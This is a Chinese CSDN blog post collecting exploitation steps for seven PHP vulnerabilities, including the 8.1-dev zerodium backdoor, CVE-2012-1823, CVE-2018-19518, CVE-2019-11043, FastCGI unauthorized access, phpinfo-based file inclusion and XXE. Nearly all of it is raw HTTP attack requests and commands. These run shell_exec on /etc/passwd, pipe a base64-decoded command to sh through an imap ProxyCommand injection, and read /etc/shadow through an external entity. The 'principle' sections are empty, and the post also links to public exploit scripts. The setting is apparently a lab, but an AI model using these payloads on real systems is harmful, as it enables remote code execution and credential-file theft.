php、php-dev、php-cgi、php-imap、php-fpm、xxe漏洞合集

最新推荐文章于 2024-08-23 08:45:31 发布
最新推荐文章于 2024-08-23 08:45:31 发布
阅读量146 收藏
点赞数 1
文章标签: php 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131500370
版权
文章详细介绍了多个PHP版本中的安全漏洞,包括PHP8.1-dev的后门事件,PHP-CGI的远程代码执行漏洞(CVE-2012-1823),PHPimap远程命令执行漏洞(CVE-2018-19518),PHP-FPM远程代码执行漏洞(CVE-2019-11043)以及PHP文件包含漏洞,PHP环境的XML外部实体注入(XXE)漏洞。每个漏洞都提供了操作技巧和受影响的版本。
摘要由CSDN通过智能技术生成

1.php 8.1-dev开发版本后门事件
        操作技巧:
            GET / HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            User-agentt: zerodiumphpinfo();
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
        漏洞原理:
        漏洞版本:8.1.0-dev
    2.PHP-CGI远程代码执行漏洞(CVE-2012-1823)
        操作技巧:
            POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 44

            <?php echo shell_exec("cat /etc/passwd"); ?>
        漏洞原理:
        漏洞版本:php < 5.3.12 or php < 5.4.2
    3.PHP imap 远程命令执行漏洞(CVE-2018-19518)
        操作技巧:
            POST / HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 132
            Origin: http://192.168.68.129:8080
            Connection: close
            Referer: http://192.168.68.129:8080/
            Upgrade-Insecure-Requests: 1

            hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=qldan&password=jd1kn132
        漏洞原理:
        漏洞版本:
    4.PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
        操作技巧:
            使用go语言运行https://github.com/neex/phuip-fpizdam.git 网站下的包
            执行http://your-ip:8080/index.php?a=cat/etc/passwd 即可
        漏洞原理:
        漏洞版本:PHP 7.0、7.1、7.2、7.3
    5.PHP-FPM Fastcgi 未授权访问漏洞
        操作技巧:
            去https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75下载exp脚本
            执行命令python fpm.py 127.0.0.1 /usr/local/lib/php/PEAR.php -c '<?php echo `cat /etc/passwd`;?>'(注意命令旁边是`,不是引号,且只能在linux中执行)
        漏洞原理:
        漏洞版本:
    6.php文件包含漏洞(利用phpinfo)
        操作技巧:
            去https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py下载exp脚本
            执行命令python2 in.py 127.0.0.1 8080 100
            访问http://your-ip:8080/lfi.php?file=/tmp/g&1=system('id');
        漏洞原理:
        漏洞版本:
    7.PHP环境 XML外部实体注入漏洞(XXE)
        操作技巧:
            POST /dom.php HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 165

            <?xml version="1.0" encoding="utf-8"?> 
            <!DOCTYPE xxe [
            <!ELEMENT name ANY >
            <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
            <root>
            <name>&xxe;</name>
            </root>
        漏洞原理:
        漏洞版本:<libxml2.9.0

!QK
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php5.4.3的远程代码执行漏洞,提权挺管用
收集盒 Book box
09-20 4625
PHP com_print_typeinfo()的漏洞,通过PHP代码调用”exec”可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)ema
php 5.6.3是否存在漏洞,PHP一次性爆出三个cve漏洞
weixin_42298507的博客
03-11 1463
PHP一次性爆出三个cve漏洞2015-06-19 14:05:20阅读:0次研究人员在近期发现php三个漏洞。这三个漏洞分别是:os命令注入漏洞、在堆里面的整型溢出漏洞,还有个本地段错误漏洞。第一个是新漏洞,后两个是由于补丁修补不全重新导致的漏洞。首先让我们来看第一个漏洞:OS command injection vulnerability in escapeshellarg[CVE-2015-...
php5.3.x 漏洞,ThinkPHP 3.X/5.X order by注入漏洞
weixin_34124963的博客
03-20 629
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领...
PHP7.x的 PHP-FPM 存在远程代码执行漏洞
kuzina111的博客
10-29 4171
据外媒 ZDNet 的报道,PHP 7.x 中最近修复的一个远程代码执行漏洞正被恶意利用,并会导致攻击者控制服务器。编号为CVE-2019-11043的漏洞允许攻击者通过向目标服务器发送特制的 URL,即可在存在漏洞的服务器上执行命令。漏洞利用的PoC代码也已在 GitHub 上发布。 一旦确定了易受攻击的目标,攻击者便可以通过在URL 中附加'?a=' 以发送特制请求到易受攻...
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1910
ctfshow-php-CVE-wp----------
PHP-FPM实现性能优化
10-22
listen = /dev/shm/php-cgi.sock pm = dynamic pm.max_children = 32 pm.start_servers = 5 pm.min_spare_servers = 5 pm.max_spare_servers = 10 pm.status_path = /php_status ``` 3. **启动服务**:启动...
php-fpm-template.xml
03-13
Zabbix 监控 php-fpm 的模板
解决Linux下php-fpm进程过多导致内存耗尽问题
12-20
在Linux系统中,php-fpm(FastCGI Process Manager)是PHP的一个重要组件,它用于管理PHP进程池,处理来自Web服务器(如Nginx)的请求。当php-fpm进程过多时,可能会导致内存耗尽,从而影响到其他服务,如数据库服务...
php配置php-fpm启动参数及配置详解
12-19
4. `emergency_restart_threshold` 和 `emergency_restart_interval`:当PHP-CGI进程在指定时间内出现异常次数超过阈值时,PHP-FPM会优雅重启,防止内存泄漏等问题。 5. `process_control_timeout`:设置子进程响应...
linux下php-fpm开启关闭使用方法
09-15
### Linux下PHP-FPM的开启、关闭与使用详解 #### PHP-FPM简介 自PHP 5.3.3版本开始,PHP FastCGI Process Manager(简称PHP-FPM)已集成到PHP源码中,不再需要单独通过补丁安装。PHP-FPM是一种用于管理PHP FastCGI...
Java、python、php版的高考志愿填报辅助系统(源码、调试、LW、开题、PPT)
m0_72599287的博客
08-19 1211
高考志愿填报辅助系统采用Java、python、php三种语言做了三个不同的版本,每个版本的页面央视、功能模块都一样,具体如文中展示。
推荐一个完全自由的目录设计网站
qq_30049249的博客
08-22 412
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 848
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
thinkphp5漏洞分析之文件包含
m0_68976043的博客
08-20 653
最后,再通过一张攻击流程图来回顾整个攻击过程。
62 网络设备的暗藏的操控者SNMP
qq_56248592的博客
08-19 146
一 SNMP 简介一 SNMP 简介SNMP(Simple Network Management Protocol,简单网络管理协议)广泛用于网络设备的。SNMP允许管理员通过NMS对网络上不同厂商、不同物理特性、采用不同互联技术的设备进行管理,包括状态监控、数据采集和故障处理。
【Apache】漏洞
qq_50296568的博客
08-19 424
通过对apr_filepath_merge函数传入参数的长度+4大于APR_PATH_MAX,也就是4096的时候,则函数会返回一个路径过长的状态码,导致最后unix套接字的值是null,实现绕过unix套接字判断。(有一些带有防火墙功能的产品也有类似的漏洞比如:1Panel 远程代码执行 CVE-2024-39911)在Apache Solr 7.1之前的版本和Apache Lucene 7.1之前的版本中有RCE漏洞。SSI是一种在服务器端执行的脚本语言,通过在HTML文件中插入。
通过roles实现lamp以及其实例
2301_76858161的博客
08-19 433
第3步: 编写httpd⻆⾊的main.yml⽂件。
CSDN AI-WEB-1.0 攻略
baishiqi12的博客
08-19 743
CSDN 1.0 攻略
攻防世界-web题型-2星难度汇总-个人wp
最新发布
DamnVanish的博客
08-23 461
至此2星的靶场全部打完,个人认为catcat-new这道题最难,其次是supersqli,其它只要多花点时间和细节一点就可以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值